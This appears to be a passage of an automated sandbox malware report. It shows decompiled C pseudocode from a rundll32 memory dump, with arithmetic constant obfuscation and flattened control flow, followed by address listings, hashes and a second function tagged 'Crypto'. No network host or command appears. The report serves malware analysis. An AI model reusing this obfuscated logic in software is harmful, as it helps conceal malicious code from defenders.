				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E002C1FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E002DDCF7(_v1684, 0x2c1080, __eflags);
									_pop(_t546);
									__eflags = E002CAAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E002CA8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E002CF002(2 + E002CCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E002CCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E002D46BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x2e3e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E002DDCF7(_v1624, 0x2c1020, _t618);
													E002D176B( &_v1040, _t618);
													_t556 =  *0x2e3e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E002D1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E002CA8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

















































































                                                                                                                                    0x002e0056
                                                                                                                                    0x002e005c
                                                                                                                                    0x002e0066
                                                                                                                                    0x002e006d
                                                                                                                                    0x002e0075
                                                                                                                                    0x002e007d
                                                                                                                                    0x002e0088
                                                                                                                                    0x002e0093
                                                                                                                                    0x002e009e
                                                                                                                                    0x002e00a6
                                                                                                                                    0x002e00ab
                                                                                                                                    0x002e00b3
                                                                                                                                    0x002e00bb
                                                                                                                                    0x002e00c3
                                                                                                                                    0x002e00cf
                                                                                                                                    0x002e00d6
                                                                                                                                    0x002e00e4
                                                                                                                                    0x002e00e9
                                                                                                                                    0x002e00fa
                                                                                                                                    0x002e00fd
                                                                                                                                    0x002e0104
                                                                                                                                    0x002e010f
                                                                                                                                    0x002e011a
                                                                                                                                    0x002e0122
                                                                                                                                    0x002e012d
                                                                                                                                    0x002e013a
                                                                                                                                    0x002e0143
                                                                                                                                    0x002e0147
                                                                                                                                    0x002e014b
                                                                                                                                    0x002e0153
                                                                                                                                    0x002e015e
                                                                                                                                    0x002e0169
                                                                                                                                    0x002e0174
                                                                                                                                    0x002e0184
                                                                                                                                    0x002e0188
                                                                                                                                    0x002e018d
                                                                                                                                    0x002e0195
                                                                                                                                    0x002e01a7
                                                                                                                                    0x002e01ac
                                                                                                                                    0x002e01b5
                                                                                                                                    0x002e01c0
                                                                                                                                    0x002e01d2
                                                                                                                                    0x002e01d7
                                                                                                                                    0x002e01e0
                                                                                                                                    0x002e01eb
                                                                                                                                    0x002e01fd
                                                                                                                                    0x002e0202
                                                                                                                                    0x002e020b
                                                                                                                                    0x002e0216
                                                                                                                                    0x002e0228
                                                                                                                                    0x002e022b
                                                                                                                                    0x002e0237
                                                                                                                                    0x002e023c
                                                                                                                                    0x002e0245
                                                                                                                                    0x002e0250
                                                                                                                                    0x002e025d
                                                                                                                                    0x002e0260
                                                                                                                                    0x002e0264
                                                                                                                                    0x002e026c
                                                                                                                                    0x002e0274
                                                                                                                                    0x002e027c
                                                                                                                                    0x002e0284
                                                                                                                                    0x002e028c
                                                                                                                                    0x002e0294
                                                                                                                                    0x002e029c
                                                                                                                                    0x002e02a4
                                                                                                                                    0x002e02ac
                                                                                                                                    0x002e02b0
                                                                                                                                    0x002e02b5
                                                                                                                                    0x002e02ba
                                                                                                                                    0x002e02c2
                                                                                                                                    0x002e02ce
                                                                                                                                    0x002e02d3
                                                                                                                                    0x002e02d9
                                                                                                                                    0x002e02e1
                                                                                                                                    0x002e02e9
                                                                                                                                    0x002e02f1
                                                                                                                                    0x002e02f9
                                                                                                                                    0x002e0305
                                                                                                                                    0x002e0308
                                                                                                                                    0x002e030c
                                                                                                                                    0x002e0314
                                                                                                                                    0x002e031c
                                                                                                                                    0x002e0324
                                                                                                                                    0x002e032c
                                                                                                                                    0x002e0331
                                                                                                                                    0x002e0339
                                                                                                                                    0x002e0341
                                                                                                                                    0x002e034c
                                                                                                                                    0x002e0357
                                                                                                                                    0x002e0362
                                                                                                                                    0x002e036d
                                                                                                                                    0x002e0378
                                                                                                                                    0x002e0383
                                                                                                                                    0x002e0390
                                                                                                                                    0x002e0399
                                                                                                                                    0x002e039d
                                                                                                                                    0x002e03a5
                                                                                                                                    0x002e03ad
                                                                                                                                    0x002e03b7
                                                                                                                                    0x002e03bb
                                                                                                                                    0x002e03c3
                                                                                                                                    0x002e03cb
                                                                                                                                    0x002e03d3
                                                                                                                                    0x002e03d8
                                                                                                                                    0x002e03dd
                                                                                                                                    0x002e03e5
                                                                                                                                    0x002e03ed
                                                                                                                                    0x002e03f2
                                                                                                                                    0x002e03f7
                                                                                                                                    0x002e03ff
                                                                                                                                    0x002e040a
                                                                                                                                    0x002e0415
                                                                                                                                    0x002e0422
                                                                                                                                    0x002e042a
                                                                                                                                    0x002e042f
                                                                                                                                    0x002e0434
                                                                                                                                    0x002e043c
                                                                                                                                    0x002e0444
                                                                                                                                    0x002e044c
                                                                                                                                    0x002e0454
                                                                                                                                    0x002e045c
                                                                                                                                    0x002e0464
                                                                                                                                    0x002e046c
                                                                                                                                    0x002e0471
                                                                                                                                    0x002e0479
                                                                                                                                    0x002e0481
                                                                                                                                    0x002e0489
                                                                                                                                    0x002e0491
                                                                                                                                    0x002e0499
                                                                                                                                    0x002e04a1
                                                                                                                                    0x002e04b5
                                                                                                                                    0x002e04ba
                                                                                                                                    0x002e04c1
                                                                                                                                    0x002e04cc
                                                                                                                                    0x002e04d7
                                                                                                                                    0x002e04e2
                                                                                                                                    0x002e04ed
                                                                                                                                    0x002e04f8
                                                                                                                                    0x002e0503
                                                                                                                                    0x002e050b
                                                                                                                                    0x002e0516
                                                                                                                                    0x002e0521
                                                                                                                                    0x002e0530
                                                                                                                                    0x002e0533
                                                                                                                                    0x002e0537
                                                                                                                                    0x002e053b
                                                                                                                                    0x002e0543
                                                                                                                                    0x002e054b
                                                                                                                                    0x002e055e
                                                                                                                                    0x002e0565
                                                                                                                                    0x002e0570
                                                                                                                                    0x002e0580
                                                                                                                                    0x002e0584
                                                                                                                                    0x002e058c
                                                                                                                                    0x002e0594
                                                                                                                                    0x002e05a1
                                                                                                                                    0x002e05ad
                                                                                                                                    0x002e05b6
                                                                                                                                    0x002e05b7
                                                                                                                                    0x002e05bb
                                                                                                                                    0x002e05c3
                                                                                                                                    0x002e05cb
                                                                                                                                    0x002e05d0
                                                                                                                                    0x002e05d5
                                                                                                                                    0x002e05dd
                                                                                                                                    0x002e05e5
                                                                                                                                    0x002e05ed
                                                                                                                                    0x002e05f8
                                                                                                                                    0x002e05fc
                                                                                                                                    0x002e0604
                                                                                                                                    0x002e060f
                                                                                                                                    0x002e061a
                                                                                                                                    0x002e0625
                                                                                                                                    0x002e062d
                                                                                                                                    0x002e0642
                                                                                                                                    0x002e0647
                                                                                                                                    0x002e064d
                                                                                                                                    0x002e0655
                                                                                                                                    0x002e065d
                                                                                                                                    0x002e0669
                                                                                                                                    0x002e066e
                                                                                                                                    0x002e0674
                                                                                                                                    0x002e067c
                                                                                                                                    0x002e0684
                                                                                                                                    0x002e068c
                                                                                                                                    0x002e0697
                                                                                                                                    0x002e069f
                                                                                                                                    0x002e06aa
                                                                                                                                    0x002e06b2
                                                                                                                                    0x002e06b7
                                                                                                                                    0x002e06c4
                                                                                                                                    0x002e06c5
                                                                                                                                    0x002e06cc
                                                                                                                                    0x002e06d0
                                                                                                                                    0x002e06d8
                                                                                                                                    0x002e06e0
                                                                                                                                    0x002e06e5
                                                                                                                                    0x002e06f3
                                                                                                                                    0x002e06f7
                                                                                                                                    0x002e06ff
                                                                                                                                    0x002e070a
                                                                                                                                    0x002e0715
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0728
                                                                                                                                    0x002e0728
                                                                                                                                    0x002e072e
                                                                                                                                    0x002e098a
                                                                                                                                    0x002e0991
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0734
                                                                                                                                    0x002e073a
                                                                                                                                    0x002e08ea
                                                                                                                                    0x002e08f3
                                                                                                                                    0x002e08fb
                                                                                                                                    0x002e0901
                                                                                                                                    0x002e095c
                                                                                                                                    0x002e0967
                                                                                                                                    0x002e096a
                                                                                                                                    0x002e096f
                                                                                                                                    0x002e0993
                                                                                                                                    0x002e0995
                                                                                                                                    0x002e099a
                                                                                                                                    0x002e0740
                                                                                                                                    0x002e0742
                                                                                                                                    0x002e08ca
                                                                                                                                    0x002e08d1
                                                                                                                                    0x002e08d4
                                                                                                                                    0x002e08d6
                                                                                                                                    0x002e08de
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0748
                                                                                                                                    0x002e074e
                                                                                                                                    0x002e0831
                                                                                                                                    0x002e083c
                                                                                                                                    0x002e0840
                                                                                                                                    0x002e0855
                                                                                                                                    0x002e0856
                                                                                                                                    0x002e085b
                                                                                                                                    0x002e085e
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0754
                                                                                                                                    0x002e075a
                                                                                                                                    0x002e0811
                                                                                                                                    0x002e0817
                                                                                                                                    0x002e081f
                                                                                                                                    0x002e081f
                                                                                                                                    0x002e0822
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e081c
                                                                                                                                    0x002e0824
                                                                                                                                    0x002e0827
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0760
                                                                                                                                    0x002e0760
                                                                                                                                    0x002e0766
                                                                                                                                    0x002e076c
                                                                                                                                    0x002e0778
                                                                                                                                    0x002e0786
                                                                                                                                    0x002e0794
                                                                                                                                    0x002e07cb
                                                                                                                                    0x002e07d8
                                                                                                                                    0x002e07dc
                                                                                                                                    0x002e07ea
                                                                                                                                    0x002e07ff
                                                                                                                                    0x002e0804
                                                                                                                                    0x002e0807
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0722
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0723
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0723
                                                                                                                                    0x002e0720
                                                                                                                                    0x002e0766
                                                                                                                                    0x002e075a
                                                                                                                                    0x002e074e
                                                                                                                                    0x002e0742
                                                                                                                                    0x002e073a
                                                                                                                                    0x002e099b
                                                                                                                                    0x002e099b
                                                                                                                                    0x002e09b4
                                                                                                                                    0x002e09b4
                                                                                                                                    0x002e0723

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Agz$DWK$E+A$g$pw
                                                                                                                                    • API String ID: 0-1474679353
                                                                                                                                    • Opcode ID: 2972285c16c98cc5a80d452e260eb3818686606a609137ff36bdba6dc306e2d0
                                                                                                                                    • Instruction ID: 489c902d2833360865728222d1e7648fdbee45dc8b894e49cbdd58bb98b245c1
                                                                                                                                    • Opcode Fuzzy Hash: 2972285c16c98cc5a80d452e260eb3818686606a609137ff36bdba6dc306e2d0
                                                                                                                                    • Instruction Fuzzy Hash: 3A32227150C3808FD368CF26C98AA8BFBF2BBC5748F10891DE19986261D7B59959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CF09B Relevance: 6.6, Strings: 5, Instructions: 359COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002CF09B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
